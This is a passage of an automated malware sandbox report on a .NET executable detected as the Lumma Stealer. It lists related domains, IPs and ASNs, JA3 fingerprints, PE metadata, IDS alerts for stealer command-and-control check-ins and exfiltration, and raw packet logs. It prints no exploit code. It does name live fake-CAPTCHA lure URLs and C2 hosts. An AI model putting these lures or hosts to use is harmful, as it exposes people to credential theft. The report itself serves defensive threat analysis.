104.21.78.33	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse
185.161.251.21	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse
	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
104.21.67.165	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
u1.grapplereturnunstamped.shop	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse	104.21.78.33
	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse	104.21.78.33
	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse	172.67.215.98
klipgonuh.shop	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.15.122
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.162.153
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.162.153
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.153
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.15.122
burnressert.shop	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse	104.21.67.165

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse	104.21.78.33
	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse	104.21.32.1
	https://tinyurl.com/Amconconstruction	Get hash	malicious	Unknown	Browse	104.17.25.14
	Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139d	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3D	Get hash	malicious	Unknown	Browse	104.18.10.207
	i686.elf	Get hash	malicious	Mirai	Browse	8.44.96.126
	https://shunnarah.com/attorney/candace-t-brown	Get hash	malicious	Unknown	Browse	104.16.117.116
	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1
CLOUDFLARENETUS	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse	104.21.78.33
	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse	104.21.32.1
	https://tinyurl.com/Amconconstruction	Get hash	malicious	Unknown	Browse	104.17.25.14
	Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139d	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3D	Get hash	malicious	Unknown	Browse	104.18.10.207
	i686.elf	Get hash	malicious	Mirai	Browse	8.44.96.126
	https://shunnarah.com/attorney/candace-t-brown	Get hash	malicious	Unknown	Browse	104.16.117.116
	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1
NTLGB	bot.mips.elf	Get hash	malicious	Unknown	Browse	82.39.27.139
	bot.arm.elf	Get hash	malicious	Unknown	Browse	92.237.207.58
	arm5.elf	Get hash	malicious	Mirai	Browse	62.253.99.105
	xd.mips.elf	Get hash	malicious	Mirai	Browse	81.106.74.202
	xd.x86.elf	Get hash	malicious	Mirai	Browse	86.32.92.149
	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	82.32.112.227
	spc.elf	Get hash	malicious	Mirai	Browse	82.5.100.148
	ppc.elf	Get hash	malicious	Mirai	Browse	62.30.53.190
CLOUDFLARENETUS	https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082	Get hash	malicious	Unknown	Browse	104.21.78.33
	https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''	Get hash	malicious	Unknown	Browse	104.21.32.1
	https://tinyurl.com/Amconconstruction	Get hash	malicious	Unknown	Browse	104.17.25.14
	Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139d	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3D	Get hash	malicious	Unknown	Browse	104.18.10.207
	i686.elf	Get hash	malicious	Mirai	Browse	8.44.96.126
	https://shunnarah.com/attorney/candace-t-brown	Get hash	malicious	Unknown	Browse	104.16.117.116
	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.96.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	2lX8Z3eydC.dll	Get hash	malicious	Wannacry	Browse	104.21.78.33
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	104.21.78.33
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	104.21.78.33
	Updater.exe	Get hash	malicious	Unknown	Browse	104.21.78.33
	Updater.exe	Get hash	malicious	Unknown	Browse	104.21.78.33
	Personliche Nachricht fur e4060738.pdf	Get hash	malicious	Unknown	Browse	104.21.78.33
	https://pub-2d00d32ff6d84ef6999828eaf509b772.r2.dev/index.html#watson.becky@aidb.org	Get hash	malicious	HTMLPhisher	Browse	104.21.78.33
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.78.33
	http://www.flamingoblv.com	Get hash	malicious	Unknown	Browse	104.21.78.33
a0e9f5d64349fb13191bc781f81f42e1	L#U043e#U0430d#U0435r.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.67.165
	Xeno.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	185.161.251.21 104.21.67.165
	Adobe-Acrobat-Pro-2025.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	185.161.251.21 104.21.67.165
	MotivatedFunded.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21 104.21.67.165
	Set-Up.exe	Get hash	malicious	LummaC	Browse	185.161.251.21 104.21.67.165
	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21 104.21.67.165
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	185.161.251.21 104.21.67.165
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	185.161.251.21 104.21.67.165

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.6599547231656377
Encrypted:	false
SSDEEP:	3:NlllulRlltl:NllU
MD5:	2AAC5546A51052C82C51A111418615EB
SHA1:	14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
SHA-256:	DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
SHA-512:	1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xalb31n.svo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spdv4gax.3i2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.76934231768343
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	lummm_lzmb.exe
File size:	870'400 bytes
MD5:	0df5f44040c57cb4f63f442ae2c8d904
SHA1:	bffeae3a0bbb2a4cc801072cf6c7d8a1a0757e43
SHA256:	06384a97225d303a36c0fe0bc6f49e6d03dce0bc5f437ae8ac8a4a432ff68b61
SHA512:	e5b2e3e26020d11a7cd74f2de101f5a4e9dfa1169e83d359d247785146db993a8cee74729ffdfffa32771f8bb7177addf216ad298b817fbc4b401c31114964ab
SSDEEP:	12288:E3LFTQjt6PAr6IsE75dLS2HPWxrLHBDMhCLF7nbJ:38Ar6IsY5dZgjBghCBrb
TLSH:	9F05B77CFBEDDF40C7186276D5E39CB8E45128A11A61DE27DD80095C0B723AE868C76B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0}.g.................>...........]... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4d5d0e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67877D30 [Wed Jan 15 09:17:36 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd5cc0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd6000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd3d14	0xd3e00	92bd5a6f7dc572b968a30ab43bb8664c	False	0.44020441556047196	SysEx File -	5.772767736898357	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd6000	0x600	0x600	298bbd1a6660c9418a4b7a9992a32ef6	False	0.412109375	data	4.017088685804918	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd8000	0xc	0x200	eb75b955bcb840361c095881a0e28117	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xd60a0	0x2fc	data			0.43848167539267013
RT_MANIFEST	0xd639c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T17:25:03.578268+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.67.165	443	TCP
2025-01-15T17:25:04.096224+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	104.21.67.165	443	TCP
2025-01-15T17:25:04.096224+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.67.165	443	TCP
2025-01-15T17:25:05.376551+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.67.165	443	TCP
2025-01-15T17:25:05.906464+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	104.21.67.165	443	TCP
2025-01-15T17:25:05.906464+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.67.165	443	TCP
2025-01-15T17:25:06.606294+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.67.165	443	TCP
2025-01-15T17:25:19.211554+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49733	104.21.67.165	443	TCP
2025-01-15T17:25:20.057656+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.67.165	443	TCP
2025-01-15T17:25:21.112577+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.67.165	443	TCP
2025-01-15T17:25:22.736822+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.67.165	443	TCP
2025-01-15T17:25:23.654243+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.67.165	443	TCP
2025-01-15T17:25:24.830182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.67.165	443	TCP
2025-01-15T17:25:25.294634+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49744	104.21.67.165	443	TCP
2025-01-15T17:25:26.246543+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	185.161.251.21	443	TCP
2025-01-15T17:25:27.030690+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	104.21.15.122	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 17:25:00.078505039 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.078598022 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:00.078680038 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.096035957 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.096072912 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:00.617496014 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:00.617615938 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.623853922 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.623882055 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:00.624370098 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:00.664894104 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.668545961 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:00.711385012 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011109114 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011164904 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011204004 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011234045 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011270046 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011317015 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.011317015 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.011328936 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011343956 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011375904 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.011413097 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011457920 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011490107 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.011507034 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.011567116 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.011575937 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.015882969 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.016077995 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.016141891 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.071170092 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.101078987 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102267981 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102308035 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102345943 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102385998 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102437019 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102457047 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102456093 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102456093 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102492094 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102539062 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102539062 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102742910 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102802038 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102834940 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102853060 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102861881 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102895021 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102909088 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102916956 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.102981091 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.102996111 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.103662968 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.103722095 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.103734016 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.103741884 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.103775024 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.103811026 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.103825092 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.103883982 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.103898048 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.104582071 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.104641914 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.104655027 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.146316051 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.146399975 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.146465063 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.191720009 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.191772938 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.191792011 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.191824913 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.191879988 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.191900015 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.191961050 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.192018986 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.192032099 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.192092896 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.192502975 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.192548037 CET	443	49730	104.21.78.33	192.168.2.4
